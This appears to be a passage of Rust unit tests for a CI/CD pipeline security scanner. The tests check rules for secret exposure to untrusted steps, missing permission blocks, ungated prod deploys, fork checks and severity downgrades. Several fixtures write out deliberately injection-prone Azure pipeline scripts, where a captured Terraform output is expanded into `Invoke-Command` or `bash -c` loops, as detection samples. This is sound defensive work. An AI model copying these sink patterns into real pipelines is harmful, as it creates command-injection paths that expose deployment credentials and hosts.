    let mut g = AuthorityGraph::new(source("ci.yml"));
    let secret = g.add_node(NodeKind::Secret, "CLOUD_KEY", TrustZone::FirstParty);
    let writer_meta = std::collections::HashMap::from([
        (META_JOB_NAME.into(), "build".into()),
        (META_WRITES_ENV_GATE.into(), "true".into()),
    ]);
    let writer =
        g.add_node_with_metadata(NodeKind::Step, "setup", TrustZone::FirstParty, writer_meta);
    g.add_edge(writer, secret, EdgeKind::HasAccessTo);
    // Consumer lives in a DIFFERENT job from the writer's.
    let consumer_meta = std::collections::HashMap::from([
        (META_JOB_NAME.into(), "deploy".into()),
        (META_READS_ENV.into(), "true".into()),
    ]);
    g.add_node_with_metadata(
        NodeKind::Step,
        "remote-deploy",
        TrustZone::Untrusted,
        consumer_meta,
    );
    assert!(
        secret_via_env_gate_to_untrusted_consumer(&g).is_empty(),
        "cross-job writer/consumer pair must not fire — same-job constraint"
    );
}
#[test]
fn writer_after_consumer_in_same_job_does_not_fire() {
    // Declaration order matters: a writer that comes AFTER the
    // consumer can't have populated the env the consumer read. Without
    // this ordering check the rule would over-fire on any same-job
    // write/read pair.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("deploy", TrustZone::Untrusted, false, true, None),
        ("setup", TrustZone::FirstParty, true, false, Some("CLOUD_KEY")),
    ];
    let (g, _) = job_with_steps("build", steps);
    assert!(
        secret_via_env_gate_to_untrusted_consumer(&g).is_empty(),
        "writer that runs after the consumer cannot launder into it"
    );
}
#[test]
fn third_party_consumer_also_fires() {
    // ThirdParty (SHA-pinned marketplace action) is still in scope —
    // the action's code is immutable but it can still receive and
    // exfiltrate the laundered secret.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("setup", TrustZone::FirstParty, true, false, Some("CLOUD_KEY")),
        ("third-party-deploy", TrustZone::ThirdParty, false, true, None),
    ];
    let (g, _) = job_with_steps("build", steps);
    assert_eq!(secret_via_env_gate_to_untrusted_consumer(&g).len(), 1);
}
#[test]
fn rule_appears_in_run_all_rules() {
    // run_all_rules wires every rule in the catalogue — assert the
    // new one is hooked up so it actually fires from the CLI scan path.
    let steps: &[(&str, TrustZone, bool, bool, Option<&str>)] = &[
        ("setup", TrustZone::FirstParty, true, false, Some("CLOUD_KEY")),
        ("deploy", TrustZone::Untrusted, false, true, None),
    ];
    let (g, _) = job_with_steps("build", steps);
    let hooked_up = run_all_rules(&g, 4)
        .iter()
        .any(|f| f.category == FindingCategory::SecretViaEnvGateToUntrustedConsumer);
    assert!(
        hooked_up,
        "secret_via_env_gate_to_untrusted_consumer must run via run_all_rules"
    );
}
// ── no_workflow_level_permissions_block ──────────────────
/// Build an empty graph for `file` with its platform marker
/// (`META_PLATFORM`) set in the graph-level metadata.
fn graph_with_platform(platform: &str, file: &str) -> AuthorityGraph {
    let mut graph = AuthorityGraph::new(source(file));
    graph
        .metadata
        .insert(META_PLATFORM.to_string(), platform.to_string());
    graph
}
#[test]
fn no_workflow_perms_fires_on_gha_when_marker_present_and_no_token_identity() {
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    g.metadata
        .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
    // A real workflow always has at least one Step. The empty-graph
    // guard inside the rule excludes mis-classified variable-only YAML.
    g.add_node(NodeKind::Step, "build[0]", TrustZone::FirstParty);
    // No GITHUB_TOKEN identity nodes at all (parser would skip creating
    // them when there's no permissions block anywhere).
    let findings = no_workflow_level_permissions_block(&g);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Medium);
    assert_eq!(
        finding.category,
        FindingCategory::NoWorkflowLevelPermissionsBlock
    );
}
#[test]
fn no_workflow_perms_does_not_fire_on_empty_graph() {
    // Empty graph (variable-only YAML mis-detected as GHA, parse
    // failure, etc.) has no real authority surface — must skip.
    let mut g = graph_with_platform("github-actions", "vars.yml");
    g.metadata
        .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
    let findings = no_workflow_level_permissions_block(&g);
    assert!(findings.is_empty());
}
#[test]
fn no_workflow_perms_does_not_fire_when_a_job_declares_permissions() {
    // Workflow has no top-level permissions, but one job does — the rule
    // must not fire because the per-job override is what runs.
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    g.metadata
        .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
    let job_token_meta = std::collections::HashMap::from([
        (META_PERMISSIONS.into(), "{ contents: read }".into()),
        (META_IDENTITY_SCOPE.into(), "constrained".into()),
    ]);
    g.add_node_with_metadata(
        NodeKind::Identity,
        "GITHUB_TOKEN (build)",
        TrustZone::FirstParty,
        job_token_meta,
    );
    assert!(no_workflow_level_permissions_block(&g).is_empty());
}
#[test]
fn no_workflow_perms_does_not_fire_on_ado_or_gitlab() {
    // GitHub-Actions-specific rule: the marker alone must not trigger
    // it on other platforms.
    let cases = [
        ("azure-devops", "azure-pipelines.yml"),
        ("gitlab", ".gitlab-ci.yml"),
    ];
    for (platform, file) in cases {
        let mut g = graph_with_platform(platform, file);
        g.metadata
            .insert(META_NO_WORKFLOW_PERMISSIONS.into(), "true".into());
        assert!(no_workflow_level_permissions_block(&g).is_empty());
    }
}
// ── prod_deploy_job_no_environment_gate ───────────────────
#[test]
fn prod_deploy_no_env_gate_fires_on_ado_prod_sc_without_env_marker() {
    // Prod-named service connection on the step, no environment gate.
    let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
    step_with_meta(
        &mut g,
        "AzureCLI : Deploy",
        &[(META_SERVICE_CONNECTION_NAME, "platform-prod-sc")],
    );
    let findings = prod_deploy_job_no_environment_gate(&g);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::High);
    assert_eq!(
        finding.category,
        FindingCategory::ProdDeployJobNoEnvironmentGate
    );
    assert!(finding.message.contains("platform-prod-sc"));
}
#[test]
fn prod_deploy_no_env_gate_skips_when_env_marker_present() {
    // META_ENV_APPROVAL marks the environment gate — rule is satisfied.
    let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
    step_with_meta(
        &mut g,
        "AzureCLI : Deploy",
        &[
            (META_SERVICE_CONNECTION_NAME, "platform-prod-sc"),
            (META_ENV_APPROVAL, "true"),
        ],
    );
    let findings = prod_deploy_job_no_environment_gate(&g);
    assert!(findings.is_empty());
}
#[test]
fn prod_deploy_no_env_gate_skips_dev_connection() {
    // Dev-named service connection is out of scope for the prod rule.
    let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
    step_with_meta(
        &mut g,
        "AzureCLI : Deploy",
        &[(META_SERVICE_CONNECTION_NAME, "platform-dev-sc")],
    );
    let findings = prod_deploy_job_no_environment_gate(&g);
    assert!(findings.is_empty());
}
#[test]
fn prod_deploy_no_env_gate_via_edge_to_prod_identity() {
    // No marker on the step itself — the prod signal arrives via an
    // edge to a service-connection Identity node.
    let mut g = graph_with_platform("azure-devops", "azure-pipelines.yml");
    let step = step_with_meta(&mut g, "AzureCLI : Deploy", &[]);
    let conn_meta =
        std::collections::HashMap::from([(META_SERVICE_CONNECTION.into(), "true".into())]);
    let conn = g.add_node_with_metadata(
        NodeKind::Identity,
        "alz-infra-sc-prd-uks",
        TrustZone::FirstParty,
        conn_meta,
    );
    g.add_edge(step, conn, EdgeKind::HasAccessTo);
    let findings = prod_deploy_job_no_environment_gate(&g);
    assert_eq!(findings.len(), 1);
    assert!(findings[0].message.contains("alz-infra-sc-prd-uks"));
}
// ── long_lived_secret_without_oidc_recommendation ─────────
#[test]
fn ll_secret_without_oidc_emits_for_aws_secret_with_no_oidc_in_graph() {
    // AWS-shaped long-lived secret and no OIDC identity anywhere →
    // Info-level federation recommendation.
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
    let findings = long_lived_secret_without_oidc_recommendation(&g);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(finding.severity, Severity::Info);
    assert!(matches!(
        finding.recommendation,
        Recommendation::FederateIdentity { .. }
    ));
}
#[test]
fn ll_secret_without_oidc_skips_when_oidc_identity_present() {
    // An OIDC-marked identity already in the graph means federation is
    // in use — the recommendation would be noise.
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
    let oidc_meta = std::collections::HashMap::from([(META_OIDC.into(), "true".into())]);
    g.add_node_with_metadata(
        NodeKind::Identity,
        "AWS/deploy-role",
        TrustZone::FirstParty,
        oidc_meta,
    );
    assert!(long_lived_secret_without_oidc_recommendation(&g).is_empty());
}
#[test]
fn ll_secret_without_oidc_skips_unrecognised_secret_names() {
    // Not AWS/GCP/Azure-shaped — no actionable OIDC migration path.
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    g.add_node(NodeKind::Secret, "INTERNAL_KEY", TrustZone::FirstParty);
    let findings = long_lived_secret_without_oidc_recommendation(&g);
    assert!(findings.is_empty());
}
// ── pull_request_workflow_inconsistent_fork_check ─────────
#[test]
fn inconsistent_fork_check_fires_when_one_job_guarded_one_unguarded() {
    // One privileged job carries a fork-check, its sibling doesn't —
    // the inconsistency itself is the finding.
    let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    let guarded = step_with_meta(
        &mut g,
        "build[0]",
        &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
    );
    let unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
    for step in [guarded, unguarded] {
        g.add_edge(step, secret, EdgeKind::HasAccessTo);
    }
    let findings = pull_request_workflow_inconsistent_fork_check(&g);
    assert_eq!(findings.len(), 1);
    let finding = &findings[0];
    assert_eq!(
        finding.category,
        FindingCategory::PullRequestWorkflowInconsistentForkCheck
    );
    // Message names both the unguarded and the guarded job.
    assert!(finding.message.contains("deploy"));
    assert!(finding.message.contains("build"));
}
#[test]
fn inconsistent_fork_check_skips_when_all_jobs_guarded() {
    // Both privileged jobs carry the fork-check — nothing inconsistent.
    let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    for (step_name, job_name) in [("build[0]", "build"), ("deploy[0]", "deploy")] {
        let step = step_with_meta(
            &mut g,
            step_name,
            &[(META_JOB_NAME, job_name), (META_FORK_CHECK, "true")],
        );
        g.add_edge(step, secret, EdgeKind::HasAccessTo);
    }
    assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
#[test]
fn inconsistent_fork_check_skips_when_no_job_guarded() {
    // Both unguarded → not "inconsistent" (the org never tried). Other
    // rules cover the underlying risk.
    let mut g = graph_with_platform("github-actions", ".github/workflows/pr.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    for (step_name, job_name) in [("build[0]", "build"), ("deploy[0]", "deploy")] {
        let step = step_with_meta(&mut g, step_name, &[(META_JOB_NAME, job_name)]);
        g.add_edge(step, secret, EdgeKind::HasAccessTo);
    }
    assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
// ── terraform_output_via_setvariable_shell_expansion ─────
/// Helper: add a Step node tagged with the given job and an inline
/// script body. Returns the node id so the caller can wire it up.
fn add_script_step_in_job(g: &mut AuthorityGraph, name: &str, job: &str, body: &str) -> NodeId {
    let meta = std::collections::HashMap::from([
        (META_SCRIPT_BODY.into(), body.into()),
        (META_JOB_NAME.into(), job.into()),
    ]);
    g.add_node_with_metadata(NodeKind::Step, name, TrustZone::FirstParty, meta)
}
#[test]
fn tf_output_setvariable_fires_on_solarwinds_corpus_pattern() {
    // Faithful reproduction of the
    // `Azure_Landing_Zone/sharedservice-solarwinds/.pipeline/deployment.yml`
    // pattern (lines ~98-180 of the corpus exemplar): a PowerShell@2
    // step reads `$env:TF_OUT_GDSVMS` and emits
    // `##vso[task.setvariable variable=gdsvms]`. A later
    // AzurePowerShell@5 step does `"$(gdsvms)" -split ","` followed by
    // `Invoke-Command` against each VM in the list.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    add_script_step_in_job(
        &mut g,
        "capture-tf-outputs",
        "Deployment_Apply",
        "Write-Host \"TF_OUT_GDSVMS: $env:TF_OUT_GDSVMS\"\n\
         Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"\n\
         Write-Host \"##vso[task.setvariable variable=amlinvms]$env:TF_OUT_AMLINVMS\"",
    );
    add_script_step_in_job(
        &mut g,
        "join-vms-to-domain",
        "Deployment_Apply",
        "$GDSvmNames = \"$(gdsvms)\" -split \",\"\n\
         foreach ($vmName in $GDSvmNames) {\n\
         Invoke-Command -ComputerName $vmName -ScriptBlock { Add-Computer }\n\
         }",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    // Two captured variables (gdsvms, amlinvms) but only `gdsvms` is
    // referenced in the sink — exactly one finding.
    assert_eq!(findings.len(), 1, "got: {findings:#?}");
    assert_eq!(findings[0].severity, Severity::High);
    assert_eq!(
        findings[0].category,
        FindingCategory::TerraformOutputViaSetvariableShellExpansion
    );
    assert!(findings[0].message.contains("gdsvms"));
    // assert_eq! (not `assert!(… == 2)`) so a failure reports the
    // actual length instead of just "assertion failed".
    assert_eq!(findings[0].nodes_involved.len(), 2);
}
#[test]
fn tf_output_setvariable_fires_on_literal_terraform_output_cli() {
    // Variant: the capture step actually shells out to
    // `terraform output -raw vm_names` instead of going through the
    // `TF_OUT_*` env-var convention. Sink uses bash -c "$(NAME)".
    let mut g = AuthorityGraph::new(source("ado.yml"));
    // Phase 1: capture terraform output into pipeline variable `vms`.
    add_script_step_in_job(
        &mut g,
        "tf-capture",
        "deploy",
        "VMS=$(terraform output -raw vm_names)\n\
         echo \"##vso[task.setvariable variable=vms;]$VMS\"",
    );
    // Phase 2: expand `$(vms)` inside a bash -c command line — a
    // shell-expansion sink for the captured value.
    add_script_step_in_job(
        &mut g,
        "tf-consume",
        "deploy",
        "bash -c \"for vm in $(vms); do ssh $vm uptime; done\"",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert_eq!(findings.len(), 1, "got: {findings:#?}");
    assert!(findings[0].message.contains("vms"));
}
#[test]
fn tf_output_setvariable_skips_when_only_phase_one_present() {
    // Capture step exists, but no later step in the same job ever
    // references the captured variable in shell-expansion position.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    add_script_step_in_job(
        &mut g,
        "capture",
        "deploy",
        "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
    );
    // Second step never mentions `$(gdsvms)` — no sink, no finding.
    add_script_step_in_job(
        &mut g,
        "innocuous-print",
        "deploy",
        "Write-Host 'Deployment complete.'",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert!(
        findings.is_empty(),
        "phase-1-only must not fire; got: {findings:#?}"
    );
}
#[test]
fn tf_output_setvariable_skips_when_only_phase_two_present() {
    // Sink step uses $(gdsvms) in shell-expansion position, but no
    // earlier step in the same job ever captured a terraform output
    // and emitted a setvariable for that name. Variable might be
    // defined elsewhere (variable group, vars yaml) — out of scope.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    // A step exists before the sink, but it captures nothing.
    add_script_step_in_job(&mut g, "noop-first", "deploy", "echo 'starting deploy'");
    add_script_step_in_job(
        &mut g,
        "consume-only",
        "deploy",
        "$names = \"$(gdsvms)\" -split \",\"\n\
         foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert!(
        findings.is_empty(),
        "phase-2-only must not fire; got: {findings:#?}"
    );
}
#[test]
fn inconsistent_fork_check_skips_non_pr_trigger() {
    // Same guarded/unguarded mix as the firing case, but under a push
    // trigger — the rule is scoped to pull_request workflows.
    let mut g = graph_with_platform("github-actions", ".github/workflows/push.yml");
    g.metadata.insert(META_TRIGGER.into(), "push".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    let guarded = step_with_meta(
        &mut g,
        "build[0]",
        &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
    );
    let unguarded = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
    for step in [guarded, unguarded] {
        g.add_edge(step, secret, EdgeKind::HasAccessTo);
    }
    assert!(pull_request_workflow_inconsistent_fork_check(&g).is_empty());
}
// ── gitlab_deploy_job_missing_protected_branch_only ────────
#[test]
fn gitlab_deploy_no_protected_only_fires_on_prod_env_without_marker() {
    // Production environment, no `rules_protected_only` marker → fires.
    // Uses the shared META_ENVIRONMENT_NAME constant instead of the raw
    // "environment_name" literal so the test can't silently drift from
    // the key the parser/rule actually uses (the sibling test already
    // uses META_RULES_PROTECTED_ONLY in the same slice).
    let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
    step_with_meta(
        &mut g,
        "deploy-prod",
        &[(META_ENVIRONMENT_NAME, "production")],
    );
    let findings = gitlab_deploy_job_missing_protected_branch_only(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Medium);
    assert_eq!(
        findings[0].category,
        FindingCategory::GitlabDeployJobMissingProtectedBranchOnly
    );
}
#[test]
fn gitlab_deploy_no_protected_only_skips_when_marker_present() {
    // `rules_protected_only` marker present → rule satisfied. Uses the
    // shared META_ENVIRONMENT_NAME constant instead of the raw
    // "environment_name" literal for consistency with the other
    // metadata keys in this slice.
    let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
    step_with_meta(
        &mut g,
        "deploy-prod",
        &[
            (META_ENVIRONMENT_NAME, "production"),
            (META_RULES_PROTECTED_ONLY, "true"),
        ],
    );
    assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
}
#[test]
fn gitlab_deploy_no_protected_only_skips_dev_environment() {
    // Non-production environment name — out of scope. Uses the shared
    // META_ENVIRONMENT_NAME constant instead of the raw
    // "environment_name" literal for consistency.
    let mut g = graph_with_platform("gitlab", ".gitlab-ci.yml");
    step_with_meta(
        &mut g,
        "deploy-staging",
        &[(META_ENVIRONMENT_NAME, "staging")],
    );
    assert!(gitlab_deploy_job_missing_protected_branch_only(&g).is_empty());
}
// ── compensating-control suppressions ─────────────────────
#[test]
fn suppression_checkout_pr_downgraded_when_no_privileged_steps_in_job() {
    // Build a graph where checkout_self_pr_exposure would fire BUT the
    // job has no secret access and no env-gate writes.
    let mut g = graph_with_platform("github-actions", ".github/workflows/lint.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request_target".into());
    step_with_meta(
        &mut g,
        "lint[0]",
        &[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
    );
    // A second non-privileged step in the same job.
    step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
    let mut findings = checkout_self_pr_exposure(&g);
    assert_eq!(findings.len(), 1);
    // Severity before the suppression pass runs.
    assert_eq!(findings[0].severity, Severity::High);
    apply_compensating_controls(&g, &mut findings);
    assert_eq!(
        findings[0].severity,
        Severity::Info,
        "checkout in a job with no privileged steps must downgrade to Info"
    );
    assert!(findings[0].message.contains("downgraded"));
}
#[test]
fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
    let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request_target".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
    // The checkout step itself has no edges; the privilege sits on a
    // sibling step in the same job.
    step_with_meta(
        &mut g,
        "build[0]",
        &[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
    );
    let privileged = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
    g.add_edge(privileged, secret, EdgeKind::HasAccessTo);
    let mut findings = checkout_self_pr_exposure(&g);
    assert_eq!(findings.len(), 1);
    let pre = findings[0].severity;
    apply_compensating_controls(&g, &mut findings);
    assert_eq!(
        findings[0].severity, pre,
        "must NOT downgrade when same job has privileged steps"
    );
}
#[test]
fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
    // pull_request_target trigger + every privileged step has fork-check.
    let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request_target".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    let guarded = step_with_meta(
        &mut g,
        "build[0]",
        &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
    );
    g.add_edge(guarded, secret, EdgeKind::HasAccessTo);
    let mut findings = trigger_context_mismatch(&g);
    assert_eq!(findings.len(), 1);
    assert_eq!(findings[0].severity, Severity::Critical);
    apply_compensating_controls(&g, &mut findings);
    let suppressed = &findings[0];
    assert_eq!(
        suppressed.severity,
        Severity::Medium,
        "trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
    );
    assert!(suppressed.message.contains("downgraded"));
}
#[test]
fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
    // pull_request_target trigger; only one of the two privileged steps
    // carries a fork-check, so the downgrade must not apply.
    let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
    g.metadata
        .insert(META_TRIGGER.into(), "pull_request_target".into());
    let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
    let s_guard = step_with_meta(
        &mut g,
        "build[0]",
        &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
    );
    let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
    g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
    g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
    let mut findings = trigger_context_mismatch(&g);
    // Guard the [0] access: a diagnostic failure is clearer than an
    // index panic if the rule ever stops firing on this setup.
    assert_eq!(findings.len(), 1, "trigger_context_mismatch must fire: {findings:#?}");
    let pre = findings[0].severity;
    apply_compensating_controls(&g, &mut findings);
    assert_eq!(findings[0].severity, pre);
}
#[test]
fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
    // Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
    let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
    // Broad workflow-level token identity.
    let mut wf_meta = std::collections::HashMap::new();
    wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
    wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
    let wf_token = g.add_node_with_metadata(
        NodeKind::Identity,
        "GITHUB_TOKEN",
        TrustZone::FirstParty,
        wf_meta,
    );
    // Narrower job-level override identity ("GITHUB_TOKEN (build)").
    let mut job_meta = std::collections::HashMap::new();
    job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
    job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
    g.add_node_with_metadata(
        NodeKind::Identity,
        "GITHUB_TOKEN (build)",
        TrustZone::FirstParty,
        job_meta,
    );
    // A step wired to the broad workflow-level token only.
    let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
    g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
    let mut findings = over_privileged_identity(&g);
    // Filter to only the workflow-level finding (the constrained job-level
    // override won't fire over_privileged_identity by itself).
    // A finding is "workflow-level" when its first involved node is the
    // identity literally named "GITHUB_TOKEN".
    let wf_findings_count = findings
        .iter()
        .filter(|f| {
            f.nodes_involved
                .first()
                .and_then(|id| g.node(*id))
                .map(|n| n.name == "GITHUB_TOKEN")
                .unwrap_or(false)
        })
        .count();
    assert_eq!(wf_findings_count, 1);
    apply_compensating_controls(&g, &mut findings);
    // Re-locate the workflow-level finding after the suppression pass.
    let demoted = findings.iter().find(|f| {
        f.nodes_involved
            .first()
            .and_then(|id| g.node(*id))
            .map(|n| n.name == "GITHUB_TOKEN")
            .unwrap_or(false)
    });
    let demoted = demoted.expect("workflow-level token finding still present");
    assert_eq!(
        demoted.severity,
        Severity::Info,
        "workflow-level over_priv must downgrade to Info when narrower job override exists"
    );
    assert!(demoted.message.contains("suppressed"));
}
#[test]
fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
    // Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
    // a context with no shell-expansion sigils (no bash -c, no eval,
    // no Invoke-Command, no -split, no command substitution, not
    // line-leading). The value is quoted by the shell on its way
    // into echo's argv and never reaches an interpreter.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    // Phase 1 capture is present and valid…
    add_script_step_in_job(
        &mut g,
        "capture",
        "deploy",
        "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
    );
    // …but the only reference downstream is a quoted echo argument.
    add_script_step_in_job(
        &mut g,
        "safe-echo",
        "deploy",
        "echo \"gdsvms is: $(gdsvms)\"",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert!(
        findings.is_empty(),
        "properly-quoted echo must not fire; got: {findings:#?}"
    );
}
#[test]
fn tf_output_setvariable_skips_when_sink_in_different_job() {
    // Capture and sink exist, but in different jobs. Pipeline
    // variable scoping in ADO is per-stage/per-job by default — the
    // chain doesn't compose without explicit cross-job output
    // wiring (which is a separate primitive).
    let mut g = AuthorityGraph::new(source("ado.yml"));
    // Capture in job-a…
    add_script_step_in_job(
        &mut g,
        "capture",
        "job-a",
        "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
    );
    // …sink in job-b: the same-job constraint must break the chain.
    add_script_step_in_job(
        &mut g,
        "consume",
        "job-b",
        "$names = \"$(gdsvms)\" -split \",\"\n\
         foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert!(
        findings.is_empty(),
        "cross-job chain must not fire; got: {findings:#?}"
    );
}
#[test]
fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
    // Inline script emits `task.setvariable` but the source value is
    // a plain pipeline variable, not anything terraform-shaped.
    // Without a TF_OUT_* / `terraform output` capture signal in the
    // body, the rule must not fire — `self_mutating_pipeline`
    // already covers the generic setvariable primitive.
    let mut g = AuthorityGraph::new(source("ado.yml"));
    // setvariable whose value comes from $(BuildId), not terraform.
    add_script_step_in_job(
        &mut g,
        "pure-setvar",
        "deploy",
        "Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
    );
    // Sink shape is identical to the firing tests — only the capture
    // signal differs.
    add_script_step_in_job(
        &mut g,
        "consume",
        "deploy",
        "$names = \"$(gdsvms)\" -split \",\"\n\
         foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
    );
    let findings = terraform_output_via_setvariable_shell_expansion(&g);
    assert!(
        findings.is_empty(),
        "setvariable without terraform-output signal must not fire; got: {findings:#?}"
    );
}
}